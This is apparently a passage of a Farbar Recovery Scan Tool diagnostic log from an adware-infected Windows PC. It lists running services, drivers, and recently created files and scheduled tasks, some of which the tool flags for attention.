R2 comyninu; C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9\hnso7C13.tmp [161792 2015-07-25] () [File not signed]
R2 CxAudMsg; C:\Windows\system32\CxAudMsg32.exe [190592 2010-12-17] (Conexant Systems Inc.)
S2 globalUpdate; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-07-14] (globalUpdate) [File not signed] <==== ATTENTION
S3 globalUpdatem; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-07-14] (globalUpdate) [File not signed] <==== ATTENTION
S2 gupdate1d0c79a30a3dacf; C:\Program Files\Google\Update\GoogleUpdate.exe [107848 2015-07-25] (Google Inc.)
S3 gupdatem1d0c79a30da9a75; C:\Program Files\Google\Update\GoogleUpdate.exe [107848 2015-07-25] (Google Inc.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [File not signed]
S4 IHProtect Service; C:\Program Files\MiuiTab\ProtectService.exe [125112 2015-06-23] (XTab system)
S3 Oexufafono; C:\Program Files\shopperz\Oexufafono.exe [2020864 2015-06-23] () [File not signed]
R2 QQPCRTP; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe [297608 2015-07-25] (Tencent)
R2 rpcnet; C:\Windows\system32\rpcnet.exe [78032 2015-06-30] (Absolute Software Corp.)
R2 RsMgrSvc; C:\Program Files\Rising\RSD\RsMgrSvc.exe [184088 2015-05-20] (Beijing Rising Information Technology Co., Ltd.)
R2 RsRavMon; C:\Program Files\Rising\RAV\ravmond.exe [277552 2014-05-14] (Beijing Rising Information Technology Co., Ltd.)
S3 TAOFrame; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TAOFrame.exe [293856 2015-07-25] (Tencent)
R3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [112552 2011-11-25] (TOSHIBA Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-13] (Microsoft Corporation)
S2 WindowsMangerProtect; C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe [707240 2015-07-25] (DTools LIMITED) <==== ATTENTION
S2 426ab601; "C:\Windows\system32\rundll32.exe" "c:\Program Files\TrimEdit\TrimEdit.dll",serv
S2 gopibeko; C:\Users\Cukwenk\AppData\Local\CD674440-1437823846-11E1-8EA2-047D7BFA1DE9\snsjB19.tmp [X]
S2 lewunutu; C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9\knst3136.tmpfs [X]
S2 NetHttpService; C:\Windows\system32\nethtsrv.exe [X]
S2 remidiju; C:\Program Files\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9\knseEA1D.tmp [X]
S2 ServiceUpdater; C:\Windows\system32\netupdsrv.exe [X]
S2 UfockFuloxo; "C:\Program Files\shopperz\LikumVutyp.exe" -cmd [X]
S2 vicoqudu; C:\Users\Cukwenk\AppData\Roaming\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9\hnsg463B.tmp [X]
S2 zejytose; C:\Users\Cukwenk\AppData\Roaming\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9\jnsrDD0E.tmp [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\Windows\System32\DRIVERS\athr.sys [2239488 2012-04-19] (Qualcomm Atheros Communications, Inc.)
R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [56344 2015-06-18] (Cherimoya Ltd)
R0 iusb3hcs; C:\Windows\System32\DRIVERS\iusb3hcs.sys [13592 2012-02-26] (Intel Corporation)
R3 iusb3hub; C:\Windows\System32\DRIVERS\iusb3hub.sys [348440 2012-02-26] (Intel Corporation)
R3 iusb3xhc; C:\Windows\System32\DRIVERS\iusb3xhc.sys [792856 2012-02-26] (Intel Corporation)
R1 kguard; C:\Windows\System32\DRIVERS\kguard.sys [77080 2015-05-14] (Beijing Rising Information Technology Co., Ltd.)
S1 nethfdrv; C:\Windows\system32\drivers\nethfdrv.sys [40528 2015-06-18] (nethfdrv)
S3 qcusbser-forge; C:\Windows\System32\DRIVERS\qcusbser.sys [214080 2015-06-17] (FORGE Incorporated)
S3 qcusbwwan-forge; C:\Windows\System32\DRIVERS\qcusbwwan.sys [422976 2015-06-17] (FORGE Incorporated)
R1 QMIEProtect; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMIEProtect.sys [49464 2015-07-25] ()
R1 QMUdisk; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMUdisk.sys [62392 2015-07-25] (Tencent)
R2 QQSysMon; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQSysMon.sys [108472 2015-07-25] (电脑管家)
R2 rsdsys; C:\Windows\system32\drivers\protreg.sys [24120 2014-05-27] (Beijing Rising Information Technology Co., Ltd.)
R1 rsutils; C:\Windows\System32\DRIVERS\rsutils.sys [83384 2015-04-08] (Beijing Rising Information Technology Co., Ltd.)
R3 SmbDrv; C:\Windows\System32\DRIVERS\Smb_driver.sys [20240 2011-12-22] (Synaptics Incorporated)
R0 sysmon; C:\Windows\System32\DRIVERS\sysmon.sys [157896 2015-04-29] (Beijing Rising Information Technology Co., Ltd.)
U2 TAOAccelerator; C:\Windows\system32\Drivers\TAOAccelerator.sys [77016 2015-07-25] (Tencent)
R2 TAOKernelDriver; C:\Windows\system32\Drivers\TAOKernel.sys [138552 2015-07-25] (Tencent Technology(Shenzhen) Company Limited)
R3 TFsFlt; C:\Windows\System32\Drivers\TFsFlt.sys [150072 2015-07-25] (电脑管家)
S3 TS888; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TS888.sys [30392 2015-07-26] (Tencent)
R1 TSCPM; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\tscpm.sys [43448 2015-07-25] (电脑管家)
S1 TSDefenseBt; C:\Windows\System32\DRIVERS\TSDefenseBt.sys [14008 2015-07-25] (Tencent)
R0 TsFltMgr; C:\Windows\System32\drivers\TsFltMgr.sys [124792 2015-07-25] (电脑管家)
R1 TSKSP; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSKsp.sys [204920 2015-07-25] (电脑管家)
S3 TSSK; C:\Windows\System32\tssk.sys [67896 2015-07-25] (电脑管家)
R1 TSSysKit; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSSysKit.sys [101560 2015-07-25] (电脑管家)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-07-26 15:28 - 2015-07-26 15:28 - 00017976 _____ C:\Users\Cucuk\Desktop\FRST.txt
2015-07-26 15:26 - 2015-07-26 15:28 - 00000000 ____D C:\FRST
2015-07-26 15:25 - 2015-07-26 01:28 - 01650688 _____ (Farbar) C:\Users\Cucuk\Desktop\FRST.exe
2015-07-26 15:24 - 2015-07-26 15:24 - 00022901 _____ C:\Users\Cucuk\Desktop\AdwCleaner[R1].txt
2015-07-26 15:19 - 2015-07-26 15:19 - 00027516 _____ C:\Users\Cucuk\Desktop\rk_DEC2.tmp.txt
2015-07-26 13:49 - 2015-07-26 13:49 - 00035064 _____ C:\Windows\system32\Drivers\TrueSight.sys
2015-07-26 10:03 - 2015-07-26 10:03 - 00000000 ____D C:\QMBackup
2015-07-26 09:47 - 2015-07-26 09:47 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\WinRAR
2015-07-26 09:40 - 2015-07-26 15:19 - 00000000 ____D C:\ProgramData\RogueKiller
2015-07-26 09:34 - 2015-07-26 15:23 - 00000000 ____D C:\AdwCleaner
2015-07-26 00:41 - 2015-07-26 00:41 - 00156616 _____ C:\Windows\system32\mmc2015-07-26(00-41-08).dmp
2015-07-25 23:58 - 2015-07-25 23:58 - 00002205 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-07-25 23:58 - 2015-07-25 23:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-07-25 23:57 - 2015-07-26 01:10 - 00000880 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-25 23:57 - 2015-07-25 23:57 - 00000880 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0c79a310c975b.job
2015-07-25 23:56 - 2015-07-25 23:58 - 00000000 ____D C:\Program Files\Google
2015-07-25 23:31 - 2015-07-25 23:31 - 00155623 _____ C:\Windows\system32\mmc2015-07-25(23-31-39).dmp
2015-07-25 23:30 - 2015-07-25 23:31 - 00155277 _____ C:\Windows\system32\mmc2015-07-25(23-30-40).dmp
2015-07-25 22:57 - 2015-07-25 22:58 - 00021210 _____ C:\Windows\iis7.log
2015-07-25 22:57 - 2015-07-25 22:57 - 00000000 ____D C:\Windows\system32\BestPractices
2015-07-25 22:57 - 2015-07-25 22:57 - 00000000 ____D C:\inetpub
2015-07-25 21:37 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\vlc
2015-07-25 21:29 - 2015-07-25 21:29 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\Macromedia
2015-07-25 21:29 - 2015-07-25 21:29 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\Adobe
2015-07-25 19:12 - 2015-07-25 19:12 - 00000278 ____H C:\Windows\Tasks\User_Feed_Synchronization-{3616E477-7CF5-4B18-A6F2-C9A0B002010D}.job
2015-07-25 18:56 - 2015-07-25 18:56 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\Apple Computer
2015-07-25 18:56 - 2015-07-25 18:56 - 00000000 ____D C:\Users\Cucuk\.android
2015-07-25 18:54 - 2015-07-25 23:58 - 00000000 ____D C:\Users\Cucuk\AppData\Local\Google
2015-07-25 18:53 - 2015-07-25 21:57 - 00000000 ___RD C:\Users\Cucuk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-25 18:53 - 2015-07-25 21:57 - 00000000 ___RD C:\Users\Cucuk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-25 18:53 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cucuk
2015-07-25 18:53 - 2015-07-25 20:38 - 00000000 ____D C:\Users\Cucuk\AppData\Local\VirtualStore
2015-07-25 18:53 - 2015-07-25 18:53 - 00109216 _____ C:\Users\Cucuk\AppData\Local\GDIPFONTCACHEV1.DAT
2015-07-25 18:53 - 2015-07-25 18:53 - 00000020 ___SH C:\Users\Cucuk\ntuser.ini
2015-07-25 18:53 - 2015-07-25 18:53 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\Tencent
2015-07-25 18:53 - 2015-07-25 18:53 - 00000000 ____D C:\Users\Cucuk\AppData\Local\TOSHIBA
2015-07-25 18:53 - 2015-07-25 18:53 - 00000000 ____D C:\Users\Cucuk\AppData\Local\SRS Labs
2015-07-25 18:44 - 2015-07-25 18:44 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-07-25 17:16 - 2015-07-25 17:16 - 00000000 ____D C:\Windows\system32\UploadCache
2015-07-25 14:31 - 2015-07-25 14:31 - 00001132 _____ C:\Users\Cukwenk\Desktop\Live PC Help.lnk
2015-07-25 13:36 - 2015-07-26 09:25 - 00030392 _____ (Tencent) C:\Windows\system32\Drivers\TS888.sys
2015-07-25 13:36 - 2015-07-26 09:25 - 00000202 _____ C:\Windows\Tasks\RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380}.job
2015-07-25 13:35 - 2015-07-26 09:24 - 00002095 _____ C:\Windows\setupact.log
2015-07-25 13:35 - 2015-07-25 17:15 - 00412464 _____ C:\Windows\system32\FNTCACHE.DAT
2015-07-25 13:35 - 2015-07-25 13:35 - 00000000 _____ C:\Windows\setuperr.log
2015-07-25 13:34 - 2015-07-26 09:24 - 00027010 _____ C:\Windows\PFRO.log
2015-07-25 12:29 - 2015-07-25 15:51 - 00000000 ____D C:\Program Files\Common Files\AV
2015-07-25 12:18 - 2015-07-25 12:18 - 00000000 ____D C:\ProgramData\GRETECH
2015-07-25 12:17 - 2015-07-25 14:28 - 00109216 _____ C:\Users\Cukwenk\AppData\Local\GDIPFONTCACHEV1.DAT
2015-07-25 12:14 - 2015-07-25 17:15 - 00000000 ____D C:\ProgramData\MFAData
2015-07-25 12:14 - 2015-07-25 12:14 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\MFAData
2015-07-25 12:14 - 2015-07-25 12:14 - 00000000 ____D C:\Users\Cukwenk\.android
2015-07-25 12:12 - 2015-07-25 12:12 - 00002164 _____ C:\Windows\system32\netupdsrv.exe.lnk
2015-07-25 12:11 - 2015-07-25 12:11 - 00002162 _____ C:\Windows\system32\nethtsrv.exe.lnk
2015-07-25 12:11 - 2015-07-25 12:11 - 00002158 _____ C:\Windows\system32\hfpapi.dll.lnk
2015-07-25 12:11 - 2015-07-25 12:11 - 00002158 _____ C:\Windows\system32\hfnapi.dll.lnk
2015-07-25 12:10 - 2015-07-25 12:10 - 00000132 __RSH C:\rising.ini
2015-07-25 12:10 - 2015-07-25 12:10 - 00000122 _____ C:\Windows\system32\BsMain.ini
2015-07-25 12:10 - 2015-07-25 12:10 - 00000000 ___RD C:\RavBin
2015-07-25 12:10 - 2014-07-29 14:44 - 00091928 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\vpatch.dll
2015-07-25 12:08 - 2013-12-29 19:33 - 00256280 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\ravext.dll
2015-07-25 12:08 - 2012-09-05 12:30 - 00240472 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\bsmain.exe
2015-07-25 12:07 - 2015-05-14 17:00 - 00077080 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\kguard.sys
2015-07-25 12:07 - 2015-04-29 13:17 - 00157896 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\sysmon.sys
2015-07-25 12:07 - 2015-04-08 17:00 - 00083384 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\rsutils.sys
2015-07-25 12:07 - 2012-02-28 19:49 - 00010808 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\rsndisp.sys
2015-07-25 12:06 - 2015-07-25 12:10 - 00000000 ____D C:\ProgramData\Rising
2015-07-25 12:06 - 2015-07-25 12:07 - 00000000 ____D C:\Program Files\Rising
2015-07-25 12:06 - 2014-05-27 19:37 - 00024120 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\protreg.sys
2015-07-25 12:04 - 2015-07-25 12:04 - 00000000 ____D C:\ProgramData\TXQMPC
2015-07-25 12:04 - 2015-07-25 12:02 - 00014008 _____ (Tencent) C:\Windows\system32\Drivers\TSDefenseBt.sys
2015-07-25 12:03 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\gmsd_ra_005010040
2015-07-25 12:03 - 2015-07-25 12:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010040
2015-07-25 12:03 - 2015-07-25 12:04 - 00000000 ____D C:\Program Files\Common Files\Tencent
2015-07-25 12:03 - 2015-07-25 12:02 - 00150072 _____ (电脑管家) C:\Windows\system32\Drivers\TFsFlt.sys
2015-07-25 12:03 - 2015-07-25 12:02 - 00138552 _____ (Tencent Technology(Shenzhen) Company Limited) C:\Windows\system32\Drivers\TAOKernel.sys
2015-07-25 12:03 - 2015-07-25 12:02 - 00077016 _____ (Tencent) C:\Windows\system32\Drivers\TAOAccelerator.sys
2015-07-25 12:03 - 2015-07-25 12:02 - 00067896 _____ (电脑管家) C:\Windows\system32\TSSK.sys
2015-07-25 12:02 - 2015-07-25 12:02 - 00124792 _____ (电脑管家) C:\Windows\system32\Drivers\TsFltMgr.sys
2015-07-25 12:02 - 2015-07-25 12:02 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\腾讯软件
2015-07-25 12:01 - 2015-07-25 12:18 - 00000000 ____D C:\ProgramData\Tencent
2015-07-25 12:01 - 2015-07-25 12:03 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Tencent
2015-07-25 12:01 - 2015-07-25 12:01 - 00000000 ____D C:\Program Files\Tencent
2015-07-25 12:00 - 2015-07-25 12:00 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsp7993.tmp
2015-07-25 11:54 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\GRETECH
2015-07-25 11:54 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOM Player
2015-07-25 11:54 - 2015-07-25 11:54 - 00001183 _____ C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\GOM Player.lnk
2015-07-25 11:54 - 2015-07-25 11:54 - 00001159 _____ C:\Users\Public\Desktop\GOM Player.lnk
2015-07-25 11:47 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnyProtect PC Backup
2015-07-25 11:47 - 2015-07-25 12:02 - 00001007 _____ C:\Users\Cukwenk\Desktop\AnyProtect.lnk
2015-07-25 11:44 - 2015-07-25 11:41 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsn67E7.tmp
2015-07-25 11:41 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\Quebles Emoticons
2015-07-25 11:41 - 2015-07-25 12:20 - 00000000 ____D C:\Program Files\AnyProtectEx
2015-07-25 11:40 - 2015-07-25 11:40 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Macromedia
2015-07-25 11:40 - 2015-07-25 11:40 - 00000000 ____D C:\ProgramData\WindowsMangerProtect
2015-07-25 11:30 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\CD674440-1437823846-11E1-8EA2-047D7BFA1DE9
2015-07-25 11:29 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\ASPackage
2015-07-25 11:29 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\SysassistByHotWheel
2015-07-25 11:29 - 2015-07-25 14:20 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
2015-07-25 11:29 - 2015-07-25 12:33 - 00000000 ____D C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9
2015-07-25 11:28 - 2015-07-25 14:27 - 00000000 ____D C:\IQIYI Video
2015-07-25 11:27 - 2015-07-25 14:25 - 00000000 ____D C:\ProgramData\IQIYI Video
2015-07-25 11:27 - 2015-07-25 11:28 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\IQIYI Video
2015-07-25 11:27 - 2015-07-25 11:27 - 00000000 ____D C:\Users\Public\QiYi
2015-07-25 11:25 - 2015-07-25 12:08 - 00000000 ____D C:\Program Files\baidu
2015-07-25 11:25 - 2015-07-25 11:25 - 00000687 _____ C:\awh3D6.tmp
2015-07-25 09:27 - 2015-07-25 12:12 - 00000000 ____D C:\Program Files\RanndomPRiiice
2015-07-25 09:07 - 2015-07-25 12:11 - 00000000 ____D C:\Program Files\TrimEdit
2015-07-25 06:50 - 2015-07-25 06:49 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsh3150.tmp
2015-07-25 06:20 - 2015-07-25 06:20 - 00000687 _____ C:\awh8E5.tmp
2015-07-24 20:08 - 2015-07-24 20:08 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsa5A05.tmp
2015-07-24 19:30 - 2015-07-24 19:30 - 00000687 _____ C:\awhEAF.tmp
2015-07-24 11:18 - 2015-07-24 11:18 - 00000687 _____ C:\awh1351.tmp
2015-07-23 18:03 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\{8062D808-B313-48F4-ADF2-593DC921C2A5}
2015-07-23 15:55 - 2015-07-23 15:55 - 00000687 _____ C:\awh702.tmp
2015-07-23 12:09 - 2015-07-23 12:09 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsfD46F.tmp
2015-07-23 12:04 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010038
2015-07-23 12:04 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\gmsd_ra_005010038
2015-07-23 11:33 - 2015-07-23 11:33 - 00000687 _____ C:\awh943.tmp
2015-07-23 02:31 - 2015-07-23 02:31 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nss91EA.tmp
2015-07-23 02:03 - 2015-07-23 02:03 - 00000687 _____ C:\awhC01.tmp
2015-07-22 21:45 - 2015-07-25 13:17 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-22 21:45 - 2015-07-22 21:45 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-07-22 21:45 - 2015-07-22 21:45 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-07-22 19:13 - 2015-07-22 19:13 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsdCD32.tmp
2015-07-22 18:32 - 2015-07-22 18:32 - 00000687 _____ C:\awhF362.tmp
2015-07-16 17:41 - 2015-07-16 17:41 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2015-07-15 20:57 - 2015-07-25 12:08 - 00000000 ____D C:\Program Files\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9
2015-07-15 20:57 - 2015-07-15 20:57 - 00000000 ____D C:\Program Files\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9
2015-07-15 20:37 - 2015-07-15 20:37 - 00000670 __RSH C:\ProgramData\ntuser.pol
2015-07-15 19:31 - 2015-07-15 19:31 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nscCF02.tmp
2015-07-14 16:41 - 2015-07-25 11:20 - 00002438 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5_user.job
2015-07-14 16:41 - 2015-07-25 11:20 - 00002438 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.job
2015-07-14 16:40 - 2015-07-25 13:35 - 00003130 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6.job
2015-07-14 16:40 - 2015-07-25 12:48 - 00000000 ____D C:\Program Files\a5a9a4b1-0770-4818-adf9-8ba1777405b5
2015-07-14 16:40 - 2015-07-25 12:40 - 00005510 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00005510 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00005176 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00004486 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00004150 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00003466 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7.job
2015-07-14 16:40 - 2015-07-14 16:39 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsiB519.tmp
2015-07-14 16:39 - 2015-07-25 14:09 - 00000000 ____D C:\Program Files\CinemaPlus-3.2cV14.07
2015-07-14 16:39 - 2015-07-25 12:39 - 00002104 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10_user.job
2015-07-14 16:36 - 2015-07-14 16:36 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nshA9BA.tmp
2015-07-14 16:35 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\14536
2015-07-14 16:35 - 2015-07-25 11:20 - 00000376 _____ C:\Windows\Tasks\AmiUpdXp.job
2015-07-14 14:46 - 2015-07-14 14:46 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsz189C.tmp
2015-07-14 14:43 - 2015-07-14 14:43 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nso50EE.tmp
2015-07-14 14:07 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\vlc
2015-07-14 13:46 - 2015-07-14 13:46 - 00000000 ____D C:\Windows\system32\Macromed
2015-07-14 12:20 - 2015-07-25 13:35 - 00004452 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-4.job
2015-07-14 12:20 - 2015-07-25 13:35 - 00003096 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-7.job
2015-07-14 12:20 - 2015-07-25 13:35 - 00002404 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5.job
2015-07-14 12:20 - 2015-07-25 13:20 - 00003096 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-6.job
2015-07-14 12:20 - 2015-07-25 12:20 - 00002404 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5_user.job
2015-07-14 12:20 - 2015-07-14 12:20 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsq900D.tmp
2015-07-14 12:19 - 2015-07-25 13:19 - 00005476 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-6.job
2015-07-14 12:19 - 2015-07-25 13:19 - 00002070 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-10_user.job
2015-07-14 12:19 - 2015-07-25 12:19 - 00005476 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-7.job
2015-07-14 12:19 - 2015-07-25 12:19 - 00004798 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-11.job
2015-07-14 12:19 - 2015-07-25 12:19 - 00004116 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-3.job
2015-07-14 12:19 - 2015-07-14 12:19 - 00000000 ____D C:\Program Files\11b1563c-affa-4439-b9f5-9a7bb48fa3ff
2015-07-14 12:17 - 2015-07-14 12:17 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nspC0FF.tmp
2015-07-14 11:36 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2015-07-14 11:36 - 2015-07-14 11:36 - 00001028 _____ C:\Users\Public\Desktop\VLC media player.lnk
2015-07-14 11:35 - 2015-07-14 11:35 - 00000000 ____D C:\Program Files\VideoLAN
2015-07-14 11:17 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced System~Protector
2015-07-14 11:17 - 2015-07-14 11:17 - 00000000 ____D C:\ProgramData\Systweak
2015-07-14 11:17 - 2015-07-14 11:17 - 00000000 ____D C:\Program Files\ASP
2015-07-14 11:17 - 2015-06-29 18:24 - 00018216 _____ C:\Windows\system32\sasnative32.exe
2015-07-14 10:19 - 2015-07-14 10:19 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsj9912.tmp
2015-07-14 09:44 - 2015-07-14 09:44 - 00000000 ____D C:\Program Files\predm
2015-07-14 09:24 - 2015-07-14 09:24 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nso7EDD.tmp
2015-07-14 09:24 - 2015-07-14 09:24 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsj73C6.tmp
2015-07-14 09:10 - 2015-07-14 09:10 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nso2C4B.tmp
2015-07-14 02:13 - 2015-07-14 09:45 - 00000000 ____D C:\Program Files\gmsd_ra_005010030
2015-07-14 02:12 - 2015-07-25 09:07 - 00000000 ____D C:\ProgramData\c147d200000364f
2015-07-14 02:06 - 2015-07-14 02:06 - 00000045 _____ C:\Users\Cukwenk\AppData\Roaming\WB.CFG
2015-07-14 02:03 - 2015-07-14 02:03 - 00000000 _____ C:\Users\Cukwenk\AppData\Local\Temp.dat
2015-07-14 01:53 - 2015-07-14 01:53 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nscC5E5.tmp
2015-07-14 01:52 - 2015-07-25 11:20 - 00002420 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5_user.job
2015-07-14 01:51 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\cpuminer
2015-07-14 01:51 - 2015-07-25 12:51 - 00003112 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6.job
2015-07-14 01:51 - 2015-07-25 11:20 - 00004132 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4.job
